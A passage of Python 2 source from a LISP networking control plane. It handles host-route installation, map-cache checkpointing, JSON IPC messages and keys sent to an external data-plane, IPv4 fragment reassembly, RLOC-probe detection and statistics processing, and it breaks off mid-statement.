    # Parse "ip route" output for the installed host route and return the
    # token following "via", or None when no next-hop is found.
    #
    output = commands.getoutput("ip route | egrep '{} via'".format(rloc))
    fields = output.split(" ")
    if ("via" not in fields): return(None)

    nh_index = fields.index("via") + 1
    if (nh_index >= len(fields)): return(None)
    return(fields[nh_index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
    #
    # Add (install=True) or delete (install=False) a /32 host route,
    # optionally via a next-hop.
    #
    op = "add" if install else "delete"
    lprint("{} host-route {}, nh {}".format(op.title(), dest,
        "none" if nh == None else nh))

    if (nh == None):
        route_cmd = "ip route {} {}/32".format(op, dest)
    else:
        route_cmd = "ip route {} {}/32 via {}".format(op, dest, nh)
    #endif
    os.system(route_cmd)
    return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
    #
    # Write the supplied checkpoint entries, one per line, to the
    # checkpoint file. A no-op when checkpointing is disabled.
    #
    if (lisp_checkpoint_map_cache == False): return

    f = open(lisp_checkpoint_filename, "w")
    for entry in checkpoint_list: f.write(entry + "\n")
    f.close()

    lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
        len(checkpoint_list), lisp_checkpoint_filename))
    return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
    #
    # Read entries from the checkpoint file and add them to the map-cache.
    # Each line has the format written by lisp_write_checkpoint_entry():
    # "[<iid>]<eid-prefix> rloc <rloc> <prio> <weight>, ..." or
    # "... rloc native-forward" / "... rloc " for an RLOC-less entry.
    #
    if (lisp_checkpoint_map_cache == False): return
    if (os.path.exists(lisp_checkpoint_filename) == False): return

    f = open(lisp_checkpoint_filename, "r")
    count = 0
    for entry in f:
        count += 1
        e = entry.split(" rloc ")

        # "native-forward\n" and "\n" both mean no RLOCs were stored.
        rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
            e[1].split(", ")

        # Each RLOC string is "<address> <priority> <weight>".
        rloc_set = []
        for rloc in rlocs:
            rloc_entry = lisp_rloc(False)
            r = rloc.split(" ")
            rloc_entry.rloc.store_address(r[0])
            rloc_entry.priority = int(r[1])
            rloc_entry.weight = int(r[2])
            rloc_set.append(rloc_entry)
        #endfor

        mc = lisp_mapping("", "", rloc_set)
        if (mc != None):
            mc.eid.store_prefix(e[0])
            mc.checkpoint_entry = True
            mc.map_cache_ttl = LISP_NMR_TTL * 60
            if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
            mc.add_cache()
            continue
        #endif

        # Entry could not be turned into a mapping; don't count it.
        count -= 1
    #endfor

    f.close()
    lprint("{} {} map-cache entries from file '{}'".format(
        bold("Loaded", False), count, lisp_checkpoint_filename))
    return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
    #
    # Append one map-cache entry, formatted as
    # "[<iid>]<eid-prefix> rloc <addr> <prio> <weight>, ..." (or
    # "... rloc native-forward"), to the checkpoint array.
    #
    if (lisp_checkpoint_map_cache == False): return

    entry = "{} rloc ".format(mc.eid.print_prefix())
    for r in mc.rloc_set:
        if (r.rloc.is_null()): continue
        entry += "{} {} {}, ".format(r.rloc.print_address_no_iid(),
            r.priority, r.weight)
    #endfor

    # Strip the trailing ", " when RLOCs were written; otherwise record a
    # native-forward action when one is set.
    if (mc.rloc_set != []):
        entry = entry[0:-2]
    elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
        entry += "native-forward"
    #endif

    checkpoint_list.append(entry)
    return
#enddef
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
    #
    # Return True when the lisp-ipc-data-plane named socket exists; log
    # and return False otherwise.
    #
    if (os.path.exists(lisp_ipc_dp_socket_name)): return(True)

    lprint("Socket '{}' {}".format(lisp_ipc_dp_socket_name,
        bold("does not exist", False)))
    return(False)
#enddef
#
# lisp_write_to_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_write_to_dp_socket(entry):
    #
    # JSON-encode the supplied record and send it on the
    # lisp-ipc-data-plane named socket.
    #
    # Fix: pre-initialize rec so the except clause can reference it even
    # when json.dumps() itself raises (previously that path hit a NameError
    # which masked the real failure).
    #
    rec = None
    try:
        rec = json.dumps(entry)
        write = bold("Write IPC", False)
        lprint("{} record to named socket: '{}'".format(write, rec))
        lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
    except:
        lprint("Failed to write IPC record to named socket: '{}'".format(rec))
    #endtry
    return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_rlocs has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
    #
    # Security keys changed for an RLOC: push an updated map-cache IPC
    # record to the external data-plane for every EID the RLOC serves
    # (found via lisp_rloc_probe_list).
    #
    addr_str = rloc.rloc.print_address_no_iid()
    if (rloc.translated_port != 0):
        addr_str += ":" + str(rloc.translated_port)
    #endif
    if (addr_str not in lisp_rloc_probe_list): return

    for r, e, g in lisp_rloc_probe_list[addr_str]:
        mc = lisp_map_cache.lookup_cache(e, True)
        if (mc == None): continue
        lisp_write_ipc_map_cache(True, mc)
    #endfor
    return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
    #
    # Build (and normally send) a JSON map-cache record for the external
    # data-plane over the "lisp-ipc-data-plane" named socket. Multicast
    # entries carry an "rles" array, unicast entries an "rlocs" array.
    # Returns the record so callers can batch it when dont_send is True.
    #
    if (lisp_i_am_etr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    #
    # Write record in JSON format.
    #
    add = "add" if add_or_delete else "delete"
    entry = { "type" : "map-cache", "opcode" : add }

    multicast = (mc.group.is_null() == False)
    if (multicast):
        entry["eid-prefix"] = mc.group.print_prefix_no_iid()
        entry["rles"] = []
    else:
        entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
        entry["rlocs"] = []
    #endif
    entry["instance-id"] = str(mc.eid.instance_id)

    if (multicast):
        # RLE nodes live on the first RLOC-set entry; port 4341 is the
        # default LISP data port when no NAT translation applies.
        if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
            for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
                addr = rle_node.address.print_address_no_iid()
                port = str(4341) if rle_node.translated_port == 0 else \
                    str(rle_node.translated_port)
                r = { "rle" : addr, "port" : port }
                ekey, ikey = rle_node.get_encap_keys()
                r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
                entry["rles"].append(r)
            #endfor
        #endif
    else:
        # Only up IPv4/IPv6 RLOCs are reported to the data-plane.
        for rloc in mc.rloc_set:
            if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
                continue
            #endif
            if (rloc.up_state() == False): continue

            port = str(4341) if rloc.translated_port == 0 else \
                str(rloc.translated_port)
            r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
                str(rloc.priority), "weight" : str(rloc.weight), "port" :
                port }
            ekey, ikey = rloc.get_encap_keys()
            r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
            entry["rlocs"].append(r)
        #endfor
    #endif

    if (dont_send == False): lisp_write_to_dp_socket(entry)
    return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
    #
    # In the lisp-etr process, write the decryption keys for an RLOC (given
    # as "<addr>" or "<addr>:<port>") to the ipc-data-plane socket.
    #
    if (lisp_i_am_itr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    #
    # Get decryption key. If there is none, do not send message.
    # NOTE(review): assumes the keys array always has a slot at index 1
    # (key-id 1); a length-1 list would raise IndexError here -- confirm
    # callers always pass the full key-slot array.
    #
    if (keys == None or len(keys) == 0 or keys[1] == None): return

    ekey = keys[1].encrypt_key
    ikey = keys[1].icv_key

    #
    # Write record in JSON format. Store encryption key. Split an optional
    # ":<port>" suffix off the RLOC address string.
    #
    rp = rloc_addr.split(":")
    if (len(rp) == 1):
        entry = { "type" : "decap-keys", "rloc" : rp[0] }
    else:
        entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
    #endif
    entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")

    lisp_write_to_dp_socket(entry)
    return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
    #
    # Attach a one-element "keys" array (key-id 1) carrying the encryption
    # or decryption key plus ICV key to the supplied JSON record. Returns
    # the record unchanged when there is no key.
    #
    if (ekey == None): return(entry)

    entry["keys"] = [{ "key-id" : "1", key_type : ekey, "icv-key" : ikey }]
    return(entry)
#enddef
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
    #
    # In the lisp-etr process, report database-mappings and the ephemeral
    # NAT port to the external data-plane via the ipc-data-plane socket.
    #
    if (lisp_i_am_etr == False): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    #
    # Only IPv4 and IPv6 EIDs are reported.
    #
    records = []
    for db in lisp_db_list:
        if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
        records.append({ "instance-id" : str(db.eid.instance_id),
            "eid-prefix" : db.eid.print_prefix_no_iid() })
    #endfor
    lisp_write_to_dp_socket({ "type" : "database-mappings",
        "database-mappings" : records })

    #
    # Write ephemeral NAT port an external data-plane needs to receive
    # encapsulated packets from the RTR.
    #
    lisp_write_to_dp_socket({ "type" : "etr-nat-port", "port" : ephem_port })
    return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_interfaces():
    #
    # Report all interfaces that have an instance-id configured to the
    # external data-plane via the ipc-data-plane socket (ITR/RTR side).
    #
    if (lisp_i_am_etr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    records = []
    for interface in lisp_myinterfaces.values():
        if (interface.instance_id == None): continue
        records.append({ "interface" : interface.device,
            "instance-id" : str(interface.instance_id) })
    #endfor

    lisp_write_to_dp_socket({ "type" : "interfaces",
        "interfaces" : records })
    return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
    #
    # Parse "authentication-key" values of the form "<password>" or one or
    # more "[<key-id>]<password>" segments. Returns {key-id : password}
    # with integer key-ids (0 when no key-id was given), or None when a
    # key-id does not parse as an integer.
    #
    segments = value.split("[")
    if (len(segments) == 1): return({ 0 : value })

    auth_key = {}
    for segment in segments:
        if (segment == ""): continue

        bracket = segment.find("]")
        try:
            key_id = int(segment[0:bracket])
        except:
            return
        #endtry
        auth_key[key_id] = segment[bracket+1::]
    #endfor
    return(auth_key)
#enddef
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsulated packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
    #
    # Reassemble an IPv4 datagram from fragments; the completed result is
    # a LISP encapsulated packet. "packet" starts at the IPv4 header.
    # Returns the input unchanged for non-fragments, None while fragments
    # are outstanding (or for non-LISP fragments), and the reassembled
    # packet when complete.
    #
    # Fragment-offset field: 0x4000 is the DF bit, 0x2000 the MF bit, and
    # the low 13 bits the offset in 8-byte units.
    #
    fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])

    #
    # Not a fragment, return packet and process.
    #
    if (fo == 0 or fo == 0x4000): return(packet)

    #
    # Get key fields from fragment. A last fragment has MF clear but a
    # non-zero offset. Queue entries are
    # [<byte-offset>, <payload-length>, <packet>, <last-frag?>].
    #
    ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
    fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
    last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
    entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]

    #
    # If first fragment, check to see if LISP packet. Do not reassemble if
    # source or destination port is not 4341, 8472 or 4789. But add this to
    # the queue so when other fragments come in, we know to not queue them.
    # If other fragments came in before the first fragment, remove them from
    # the queue.
    #
    if (fo == 0x2000):
        sport, dport = struct.unpack("HH", packet[20:24])
        sport = socket.ntohs(sport)
        dport = socket.ntohs(dport)
        if (dport not in [4341, 8472, 4789] and sport != 4341):
            lisp_reassembly_queue[ident] = []
            entry[2] = None
        #endif
    #endif

    #
    # Initialized list if first fragment. Indexed by IPv4 Ident.
    #
    if (lisp_reassembly_queue.has_key(ident) == False):
        lisp_reassembly_queue[ident] = []
    #endif

    #
    # Get fragment queue based on IPv4 Ident.
    #
    queue = lisp_reassembly_queue[ident]

    #
    # Do not queue fragment if first fragment arrived and we determined its
    # not a LISP encapsulated packet.
    #
    if (len(queue) == 1 and queue[0][2] == None):
        dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
            lisp_hex_string(ident).zfill(4)))
        return(None)
    #endif

    #
    # Insert in sorted order (entries sort by byte offset).
    #
    queue.append(entry)
    queue = sorted(queue)

    #
    # Print addresses.
    #
    addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
    src = addr.print_address_no_iid()
    addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
    dst = addr.print_address_no_iid()
    addr = red("{} -> {}".format(src, dst), False)

    dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
        bold("Received", False), " non-LISP encapsulated" if \
        entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
        lisp_hex_string(fo).zfill(4)))

    #
    # Check if all fragments arrived. First check if first and last fragments
    # are in queue. Then verify each fragment starts exactly where the
    # previous one ended (no holes).
    #
    if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
    last_entry = queue[0]
    for frag in queue[1::]:
        fo = frag[0]
        last_fo, last_fl = last_entry[0], last_entry[1]
        if (last_fo + last_fl != fo): return(None)
        last_entry = frag
    #endfor
    lisp_reassembly_queue.pop(ident)

    #
    # If we did not return, we have all fragments. Now append them. Keep the
    # IP header in the first fragment but remove in each other fragment.
    #
    packet = queue[0][2]
    for frag in queue[1::]: packet += frag[2][20::]

    dprint("{} fragments arrived for packet 0x{}, length {}".format( \
        bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))

    #
    # Fix length and frag-offset field before returning and fixup checksum.
    #
    length = socket.htons(len(packet))
    header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
        struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
        packet[12:20]
    header = lisp_ip_checksum(header)
    return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<port> or <addr>:0 in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
    #
    # Try "<addr>:<port>" first, then plain "<addr>", in
    # lisp_crypto_keys_by_rloc_decap{}.
    #
    addr_str = addr.print_address_no_iid() + ":" + str(port)
    if (addr_str in lisp_crypto_keys_by_rloc_decap): return(addr_str)

    addr_str = addr.print_address_no_iid()
    if (addr_str in lisp_crypto_keys_by_rloc_decap): return(addr_str)

    #
    # We are at non-NAT based xTR. Keys may be stored under "<addr>:<port>"
    # with some other port; copy them to a port-less "<addr>" entry. The
    # ":".join handles IPv6 addresses that themselves contain colons.
    #
    for ap in lisp_crypto_keys_by_rloc_decap:
        a = ap.split(":")
        if (len(a) == 1): continue
        a = a[0] if len(a) == 2 else ":".join(a[0:-1])
        if (a == addr_str):
            lisp_crypto_keys_by_rloc_decap[addr_str] = \
                lisp_crypto_keys_by_rloc_decap[ap]
            return(addr_str)
        #endif
    #endfor
    return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
    """
    Decide whether the decap crypto lookup key is "<addr>:<port>" or just
    "<addr>". On an RTR: an RLOC found in the RLOC-probe list gets a
    port-less key; an RLOC found in the NAT state cache is behind a NAT
    and keeps its translated port; anything else is an xTR in public
    address space and gets a port-less key. Non-RTR nodes always use
    "<addr>:<port>".
    """
    rloc_str = addr.print_address_no_iid()
    with_port = "{}:{}".format(rloc_str, port)

    if (lisp_i_am_rtr == False): return(with_port)

    if (rloc_str in lisp_rloc_probe_list): return(rloc_str)

    #
    # Have to check the NAT cache to see if the RLOC is translated. If not,
    # this is an xTR in public space. We'll have to change this in the
    # future so we don't do a full table traversal.
    #
    for nat_state in lisp_nat_state_info.values():
        for nat in nat_state:
            if (nat.address == rloc_str): return(with_port)
        #endfor
    #endfor
    return(rloc_str)
#enddef
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
    """
    Set the IPv4 TTL used for packets sent on 'lisp_socket'.

    Best-effort: platforms without SOL_IP/IP_TTL support just log and
    continue. The former bare 'except' is narrowed to the exceptions this
    call can actually raise (socket.error covers OSError on Python 3;
    AttributeError covers platforms missing socket.SOL_IP).
    """
    try:
        lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
    except (socket.error, AttributeError):
        lprint("socket.setsockopt(IP_TTL) not supported")
    #endtry
    return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
    """
    Given the first byte of a LISP control message, return True when it is
    0x12, a Map-Request RLOC-probe.
    """
    first_byte = struct.unpack("B", lisp_type)[0]
    return(first_byte == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
    """
    Given the first byte of a LISP control message, return True when it is
    0x28, a Map-Reply RLOC-probe.
    """
    first_byte = struct.unpack("B", lisp_type)[0]
    return(first_byte == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
    """
    Inspect a pcap'ed IPv4 packet and decide if it is an RLOC-probe.

    'rr' selects which probe type to look for: 0 = Map-Request probe (ETR),
    1 = Map-Reply probe (ITR), -1 = either (RTR).

    Returns [packet, source, port, ttl] with 'packet' positioned at the
    LISP header when it is a probe; [packet, None, None, None] untouched
    when it is not; and [None, None, None, None] when the probe came from
    a local interface (our own probe looped back).
    """
    # IPv4 protocol field (byte 9) must be 17 (UDP).
    udp = (struct.unpack("B", packet[9])[0] == 17)
    if (udp == False): return([packet, None, None, None])

    # Ports are left in network byte order and compared against
    # htons(LISP_CTRL_PORT), so no per-field ntohs is needed here.
    sport = struct.unpack("H", packet[20:22])[0]
    dport = struct.unpack("H", packet[22:24])[0]
    is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
    if (is_lisp == False): return([packet, None, None, None])

    # packet[28] is the first LISP payload byte (20-byte IPv4 header +
    # 8-byte UDP header).
    if (rr == 0):
        probe = lisp_is_rloc_probe_request(packet[28])
        if (probe == False): return([packet, None, None, None])
    elif (rr == 1):
        probe = lisp_is_rloc_probe_reply(packet[28])
        if (probe == False): return([packet, None, None, None])
    elif (rr == -1):
        probe = lisp_is_rloc_probe_request(packet[28])
        if (probe == False):
            probe = lisp_is_rloc_probe_reply(packet[28])
            if (probe == False): return([packet, None, None, None])
        #endif
    #endif

    #
    # Get source address, source port, and TTL. Decrement TTL.
    #
    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])

    #
    # If this is a RLOC-probe from ourselves, drop.
    #
    if (source.is_local()): return([None, None, None, None])

    #
    # Accept, and return source, port, and ttl to caller.
    #
    source = source.print_address_no_iid()
    port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
    # TTL is pre-decremented for the caller's forwarding decision.
    ttl = struct.unpack("B", packet[8])[0] - 1
    # Strip IPv4 + UDP headers, leaving the LISP control message.
    packet = packet[28::]

    r = bold("Receive(pcap)", False)
    f = bold("from " + source, False)
    p = lisp_format_packet(packet)
    lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
    return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
    """
    Send an "xtr-parameters" IPC message to an external data-plane over
    lisp_ipc_dp_socket. 'cp' and 'dp' are the control-plane and data-plane
    logging booleans; the RTR role flag is taken from lisp_i_am_rtr.
    No-op when no data-plane IPC socket exists.
    """
    if (lisp_ipc_dp_socket == None): return

    params = {}
    params["type"] = "xtr-parameters"
    params["control-plane-logging"] = cp
    params["data-plane-logging"] = dp
    params["rtr"] = lisp_i_am_rtr

    lisp_write_to_dp_socket(params)
    return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
    """
    Return True when an external data-plane is in use: either
    "ipc-data-plane = yes" appears in ./lisp.config or the
    LISP_RUN_LISP_XTR environment variable is set.
    """
    cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
    if (commands.getoutput(cmd) != ""): return(True)
    return(os.getenv("LISP_RUN_LISP_XTR") != None)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
    """
    Resync a restarted external data-plane: touch ./lisp.config so all
    configuration is re-sent, then push the entire map-cache to it. With
    do_clear=True an empty entry list is sent instead, which clears the
    external data-plane's map-cache.
    """
    os.system("touch ./lisp.config")

    entries = []
    if (do_clear == False):
        lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
    #endif

    lisp_write_to_dp_socket({ "type" : "entire-map-cache",
        "entries" : entries })
    return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
    """
    Process a "statistics" IPC message from an external data-plane: fold
    per-RLOC packet/byte counts into the matching map-cache entries, and
    send a refreshing Map-Request for any (non-group) entry whose TTL has
    elapsed. Malformed messages or entries are logged and skipped.
    """
    if (msg.has_key("entries") == False):
        lprint("No 'entries' in stats IPC message")
        return
    #endif
    if (type(msg["entries"]) != list):
        lprint("'entries' in stats IPC message must be an array")
        return
    #endif

    # NOTE: the loop variable deliberately rebinds 'msg' — each element of
    # msg["entries"] becomes the per-EID record for the rest of the loop.
    for msg in msg["entries"]:
        if (msg.has_key("eid-prefix") == False):
            lprint("No 'eid-prefix' in stats IPC message")
            continue
        #endif
        eid_str = msg["eid-prefix"]

        if (msg.has_key("instance-id") == False):
            lprint("No 'instance-id' in stats IPC message")
            continue
        #endif
        iid = int(msg["instance-id"])

        #
        # Lookup EID-prefix in map-cache.
        #
        eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
        eid.store_prefix(eid_str)
        mc = lisp_map_cache_lookup(None, eid)
        if (mc == None):
            lprint("Map-cache entry for {} not found for stats update". \
                format(eid_str))
            continue
        #endif

        if (msg.has_key("rlocs") == False):
            lprint("No 'rlocs' in stats IPC message for {}".format( \
                eid_str))
            continue
        #endif
        if (type(msg["rlocs"]) != list):
            lprint("'rlocs' in stats IPC message must be an array")
            continue
        #endif
        ipc_rlocs = msg["rlocs"]

        #
        # Loop through RLOCs in IPC message.
        #
        for ipc_rloc in ipc_rlocs:
            if (ipc_rloc.has_key("rloc") == False): continue

            rloc_str = ipc_rloc["rloc"]
            if (rloc_str == "no-address"): continue

            rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
            rloc.store_address(rloc_str)

            rloc_entry = mc.get_rloc(rloc)
            if (rloc_entry == None): continue

            #
            # Update stats. Missing counters default to 0.
            #
            pc = 0 if ipc_rloc.has_key("packet-count") == False else \
                ipc_rloc["packet-count"]
            bc = 0 if ipc_rloc.has_key("byte-count") == False else \
                ipc_rloc["byte-count"]
            ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
                ipc_rloc["seconds-last-packet"]

            rloc_entry.stats.packet_count += pc
            rloc_entry.stats.byte_count += bc
            # 'ts' is seconds-since-last-packet, so subtract it from "now"
            # to get the absolute time of the last increment.
            rloc_entry.stats.last_increment = lisp_get_timestamp() - ts

            lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
                ts, eid_str, rloc_str))
        #endfor

        #
        # Check if this map-cache entry needs refreshing.
        #
        if (mc.group.is_null() and mc.has_ttl_elapsed()):
            eid_str = green(mc.print_eid_tuple(), False)
            lprint("Refresh map-cache entry {}".format(eid_str))
            lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
        #endif
    #endfor
    return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If we are an RTR, we can process the stats directly. If we are an ITR we
# need to send an IPC message to the lisp-etr process.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
    """
    Process a "decap-statistics" IPC message. On an ITR the message is
    forwarded (JSON-encoded) to the lisp-etr process; on an ETR/RTR the
    per-category packet/byte counters are folded into lisp_decap_stats{}.
    """
    #
    # Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
    # Needs to be passed in IPC message as a string.
    #
    if (lisp_i_am_itr):
        lprint("Send decap-stats IPC message to lisp-etr process")
        ipc = "stats%{}".format(json.dumps(msg))
        ipc = lisp_command_ipc(ipc, "lisp-itr")
        lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
        return
    #endif

    #
    # Process stats counters in lisp-etr and lisp-rtr processes. Variable
    # 'msg' is a dictionary array when the ITR/RTR is processing msg. When
    # an ETR is processing it, it received a json string from the ITR so it
    # needs to convert to a dictionary array.
    #
    ipc = bold("IPC", False)
    lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
    if (lisp_i_am_etr): msg = json.loads(msg)

    key_names = ["good-packets", "ICV-error", "checksum-error",
        "lisp-header-error", "no-decrypt-key", "bad-inner-version",
        "outer-header-error"]

    # Missing categories contribute 0. 'seconds-last-packet' is relative,
    # so subtract from "now" to get the last-increment timestamp.
    for key_name in key_names:
        pc = 0 if msg.has_key(key_name) == False else \
            msg[key_name]["packet-count"]
        lisp_decap_stats[key_name].packet_count += pc
        bc = 0 if msg.has_key(key_name) == False else \
            msg[key_name]["byte-count"]
        lisp_decap_stats[key_name].byte_count += bc
        ts = 0 if msg.has_key(key_name) == False else \
